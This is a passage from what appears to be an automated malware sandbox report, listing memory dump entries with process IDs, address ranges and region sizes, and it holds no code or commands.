                                                                                                                    Filesize

                                                                                                                    452KB

                                                                                                                  • memory/1300-429-0x0000000002F10000-0x0000000003836000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    9.1MB

                                                                                                                  • memory/1300-326-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/1300-432-0x0000000000400000-0x0000000000D41000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    9.3MB

                                                                                                                  • memory/1364-221-0x000001AF91C10000-0x000001AF91C81000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    452KB

                                                                                                                  • memory/1412-226-0x00000207142A0000-0x0000020714311000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    452KB

                                                                                                                  • memory/1500-158-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/1620-265-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/1620-317-0x00000000008E0000-0x00000000008E1000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/1620-351-0x0000000005A50000-0x0000000005A51000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/1620-342-0x0000000005A10000-0x0000000005A11000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/1620-350-0x00000000059C0000-0x00000000059C1000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/1620-337-0x0000000005990000-0x0000000005991000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/1620-305-0x0000000077580000-0x000000007770E000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    1.6MB

                                                                                                                  • memory/1620-163-0x0000000000450000-0x0000000000451000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/1620-159-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/1620-334-0x0000000005FE0000-0x0000000005FE1000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/1620-166-0x000000001BAD0000-0x000000001BAD2000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/1764-160-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/1764-176-0x0000000000400000-0x0000000000896000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4.6MB

                                                                                                                  • memory/1764-175-0x0000000000030000-0x0000000000039000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    36KB

                                                                                                                  • memory/1816-186-0x0000000000B40000-0x0000000000B9D000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    372KB

                                                                                                                  • memory/1816-184-0x0000000004464000-0x0000000004565000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    1.0MB

                                                                                                                  • memory/1816-178-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/1852-229-0x0000018641740000-0x00000186417B1000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    452KB

                                                                                                                  • memory/2100-384-0x00000000020A0000-0x000000000213D000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    628KB

                                                                                                                  • memory/2100-385-0x0000000000400000-0x00000000004C0000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    768KB

                                                                                                                  • memory/2100-264-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/2136-427-0x0000000006810000-0x0000000006811000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/2136-422-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/2136-430-0x0000000006812000-0x0000000006813000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/2212-143-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/2488-220-0x0000020F53140000-0x0000020F531B1000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    452KB

                                                                                                                  • memory/2564-205-0x000002167E0A0000-0x000002167E111000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    452KB

                                                                                                                  • memory/2604-243-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/2604-450-0x00000240A2500000-0x00000240A256F000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    444KB

                                                                                                                  • memory/2644-255-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/2672-167-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/2736-227-0x0000020851A30000-0x0000020851AA1000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    452KB

                                                                                                                  • memory/2748-235-0x000002E17D000000-0x000002E17D071000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    452KB

                                                                                                                  • memory/2812-285-0x0000000000FD0000-0x0000000000FD1000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/2812-303-0x00000000058E0000-0x00000000058E1000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/2812-246-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/2856-200-0x0000028DDA600000-0x0000028DDA671000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    452KB

                                                                                                                  • memory/2892-256-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/2892-393-0x00000000007F0000-0x00000000007FA000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    40KB

                                                                                                                  • memory/2928-383-0x00000000055A0000-0x00000000055A1000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/2928-327-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/2928-359-0x0000000077580000-0x000000007770E000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    1.6MB

                                                                                                                  • memory/3032-319-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/3048-420-0x0000000002C40000-0x0000000002C56000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    88KB

                                                                                                                  • memory/3048-236-0x00000000023E0000-0x00000000023F5000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    84KB

                                                                                                                  • memory/3120-169-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/3136-401-0x0000000000400000-0x0000000000477000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    476KB

                                                                                                                  • memory/3136-257-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/3136-399-0x0000000000480000-0x00000000005CA000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    1.3MB

                                                                                                                  • memory/3176-335-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/3196-187-0x00007FF69C814060-mapping.dmp
                                                                                                                  • memory/3196-202-0x0000012FBC6E0000-0x0000012FBC751000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    452KB

                                                                                                                  • memory/3476-232-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/3632-411-0x00000000025E2000-0x00000000025E3000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/3632-418-0x00000000025E4000-0x00000000025E6000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/3632-407-0x00000000025E0000-0x00000000025E1000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/3632-405-0x0000000000400000-0x000000000047F000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    508KB

                                                                                                                  • memory/3632-412-0x00000000025E3000-0x00000000025E4000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/3632-402-0x0000000000480000-0x00000000005CA000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    1.3MB

                                                                                                                  • memory/3632-237-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/3856-397-0x0000000000402E1A-mapping.dmp
                                                                                                                  • memory/3856-400-0x0000000000400000-0x0000000000409000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    36KB

                                                                                                                  • memory/3964-157-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    100KB

                                                                                                                  • memory/3964-154-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    100KB

                                                                                                                  • memory/3964-132-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    1.5MB

                                                                                                                  • memory/3964-133-0x000000006B280000-0x000000006B2A6000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    152KB

                                                                                                                  • memory/3964-134-0x0000000000400000-0x000000000051D000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    1.1MB

                                                                                                                  • memory/3964-152-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    100KB

                                                                                                                  • memory/3964-131-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    572KB

                                                                                                                  • memory/3964-156-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    100KB

                                                                                                                  • memory/3964-117-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/4000-436-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/4008-437-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/4124-145-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/4172-141-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/4176-144-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/4184-142-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/4192-298-0x0000000000400000-0x00000000004E4000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    912KB

                                                                                                                  • memory/4192-292-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/4196-297-0x0000026F940F0000-0x0000026F9413E000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    312KB

                                                                                                                  • memory/4196-311-0x0000026F943D0000-0x0000026F94444000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    464KB

                                                                                                                  • memory/4196-291-0x00007FF69C814060-mapping.dmp
                                                                                                                  • memory/4200-313-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/4200-318-0x00000000004E0000-0x00000000005C4000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    912KB

                                                                                                                  • memory/4240-361-0x0000000004CF0000-0x0000000004CF1000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/4240-345-0x0000000000380000-0x0000000000381000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/4240-328-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/4336-387-0x0000000000418836-mapping.dmp
                                                                                                                  • memory/4336-403-0x0000000004C60000-0x0000000005266000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    6.0MB

                                                                                                                  • memory/4440-421-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/4484-270-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/4484-282-0x0000000000CA0000-0x0000000000CA1000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/4484-280-0x0000000000670000-0x0000000000671000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/4484-295-0x0000000002760000-0x0000000002762000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/4484-300-0x0000000000CE0000-0x0000000000D03000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    140KB

                                                                                                                  • memory/4484-310-0x0000000000CB0000-0x0000000000CB1000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/4568-381-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/4568-431-0x00000000001D0000-0x00000000001FE000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    184KB

                                                                                                                  • memory/4568-428-0x0000000000400000-0x00000000009BE000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    5.7MB

                                                                                                                  • memory/4600-273-0x0000000000290000-0x0000000000291000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/4600-362-0x0000000004A30000-0x0000000004A3E000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    56KB

                                                                                                                  • memory/4600-254-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/4600-284-0x0000000004A50000-0x0000000004A51000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/4624-358-0x0000000005420000-0x0000000005A26000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    6.0MB

                                                                                                                  • memory/4624-333-0x0000000000418826-mapping.dmp
                                                                                                                  • memory/4624-330-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    120KB

                                                                                                                  • memory/4728-279-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/4828-185-0x00000170393D0000-0x0000017039441000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    452KB

                                                                                                                  • memory/4828-189-0x0000017039310000-0x000001703935C000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    304KB

                                                                                                                  • memory/4848-329-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    120KB

                                                                                                                  • memory/4848-332-0x0000000000417E1A-mapping.dmp
                                                                                                                  • memory/4848-357-0x0000000005410000-0x0000000005A16000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    6.0MB

                                                                                                                  • memory/4864-433-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/4892-439-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/4916-331-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/4936-286-0x0000000000940000-0x0000000000941000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/4936-324-0x00000000057C0000-0x00000000057C1000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/4936-271-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/4936-308-0x00000000052B0000-0x00000000052B1000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/5004-312-0x0000000000400000-0x00000000004A1000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    644KB

                                                                                                                  • memory/5004-314-0x000000000046B76D-mapping.dmp
                                                                                                                  • memory/5004-322-0x0000000000400000-0x00000000004A1000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    644KB

                                                                                                                  • memory/5320-447-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/5520-453-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/5652-458-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/5768-466-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/5884-476-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/5960-480-0x0000000000000000-mapping.dmp